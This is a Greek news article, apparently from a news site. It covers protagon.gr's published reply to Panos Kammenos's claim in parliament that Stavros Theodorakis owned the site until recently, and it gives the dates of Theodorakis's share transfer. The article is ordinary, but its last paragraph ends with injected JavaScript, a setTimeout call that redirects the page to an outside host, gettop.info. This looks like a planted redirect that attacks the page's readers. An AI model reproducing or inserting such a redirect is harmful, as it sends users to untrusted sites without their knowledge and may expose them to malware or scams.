Το Protagon απαντά στον Πάνο Καμμένο

0
14

 

Απάντηση στους ισχυρισμούς του προέδρου των Ανεξαρτήτων Ελλήνων Πάνου Καμμένου, στη διάρκεια της προ ημερησίας διάταξης συζήτηση στη Βουλή για τη διαφθορά και τη διαπλοκή, έδωσε με ανακοίνωσή του ο ενημερωτικός δικτυακός τόπος protagon.gr.

Ο πρόεδρος των ΑΝΕΛ ισχυρίστηκε ότι ο ιστότοπος ανήκε έως προ διμήνου στον επικεφαλής του Ποταμιού, Σταύρο Θεοδωράκη.

Στο κείμενο της απάντησης αναφέρεται ότι «για μία ακόμη φορά ο πρόεδρος των Ανεξάρτητων Ελλήνων Πάνος Καμμένος επέλεξε να αγνοήσει την πραγματικότητα και να εκτοξεύσει ψεύδη από το βήμα της Βουλής κατά του Protagon. Όπως τονίζεται, στις 20/6/14 ολοκληρώθηκαν οι γραφειοκρατικές διαδικασίες και ο κ. Θεοδωράκης μεταβίβασε οριστικά τις μετοχές του.
Έκτοτε, παρά τις επανειλημμένες διαψεύσεις μας δια λόγων και εγγράφων παραμένει… ιδιοκτήτης του Protagon μόνο στο μυαλό του προέδρου των ΑΝΕΛ» σημειώνεται χαρακτηριστικά.

Αναλυτικά η ανακοίνωση έχει ως εξής:

«Τίνος είναι το Protagon, κ. Καμμένε (μέρος Β’);

Η απάντησή μας στα όσα ισχυρίστηκε ο πρόεδρος των Ανεξαρτήτων Ελλήνων από το βήμα της Βουλής

Για μία ακόμη φορά ο πρόεδρος των Ανεξάρτητων Ελλήνων Πάνος Καμμένος επέλεξε να αγνοήσει την πραγματικότητα και να εκτοξεύσει ψεύδη από το βήμα της Βουλής κατά του Protagon.

Η γνωστή ιστορία: ότι το Protagon ανήκε «μέχρι και προ διμήνου τουλάχιστον» στον Σταύρο Θεοδωράκη.

Ξεπερνώντας το γεγονός ότι ο ιστότοπος αυτός ήταν και είναι πολυμετοχικός (με μετόχους δημοσιογράφους, ακαδημαϊκούς δασκάλους και συγγραφείς), άρα δεν ανήκε αποκλειστικά στον νυν επικεφαλής του Ποταμιού, η Πρόταγκον ΑΕ, ιδιοκτήτρια του protagon.gr επαναλαμβάνει:

Ο κ. Θεοδωράκης στις 28/6/13 έπαψε να είναι πρόεδρος και διευθύνων σύμβουλος της Πρόταγκον ΑΕ. Στις 26/2/14 ανακοίνωσε στους δημοσιογράφους-μετόχους της εταιρείας ότι αποχωρεί και από δημοσιογράφος και μέτοχος λόγω της εμπλοκής του στην πολιτική, όπως άλλωστε κατέγραψαν αρκετά ΜΜΕ εκείνες τις ημέρες. Στις 20/6/14 ολοκληρώθηκαν οι γραφειοκρατικές διαδικασίες και μεταβίβασε οριστικά τις μετοχές του.
Έκτοτε, παρά τις επανειλημμένες διαψεύσεις μας δια λόγων και εγγράφων παραμένει… ιδιοκτήτης του Protagon μόνο στο μυαλό του προέδρου των ΑΝΕΛ». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here